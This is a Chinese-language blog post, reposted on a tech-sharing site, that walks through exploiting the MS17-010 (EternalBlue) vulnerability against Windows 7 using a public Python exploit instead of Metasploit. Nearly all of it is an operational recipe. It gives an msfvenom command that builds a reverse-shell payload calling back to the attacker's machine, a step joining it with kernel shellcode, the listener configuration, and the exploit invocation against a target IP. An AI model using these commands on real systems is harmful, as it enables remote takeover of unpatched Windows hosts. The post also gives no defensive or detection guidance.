标签：bin shell reverse python 192.168 010 MS17 msf

前言

    才想起来自己还有个博客，草率了

    原因：前段时间去做某个公司的内网渗透(打酱油的)，内网中扫出了很多的MS17-010，但是msf一直打不成功 5和6的版本都试了就是不行，一度以为机器上的某个杀软打的虚拟补丁，最后小伙伴用这个py脚本打成功了，还是太相信msf了，据说有大佬用msf打ms17-010打了一个月才成功。。。。

进入正题

贴上gaylab项目地址：https://github.com/338317/MS17-010

kali：192.168.149.167

win7：192.168.149.140

过程如下：

生成msf的payload:
msfvenom -p windows/x64/shell_reverse_tcp -f raw -o shell_msf.bin EXITFUNC=thread LHOST=192.168.149.167 LPORT=4456

将生成的shellcode与提供的文件组成完整的shellcode：
cat eternalblue_kshellcode_x64.asm shell_msf.bin >>reverse_shell.bin

kali上设置监听：
use exploit/multi/handler
set payload windows/x64/shell/reverse_tcp(与上面生成shellcode的一样)
set EXITFUNC thread
set lhost 192.168.149.167
ste lport 4456
run

启动程序：
python eternalblue_exploit7.py 192.168.149.140 reverse_shell.bin
ps：eternalblue_exploit7用于低版本的windows，如:Windows 7/2008，eternalblue_exploit8用于高版本的windows，如:Windows 8/2012

成功率比较高，当然“小心蓝屏”

标签：bin,shell,reverse,python,192.168,010,MS17,msf
来源： https://www.cnblogs.com/Id3al/p/13861556.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。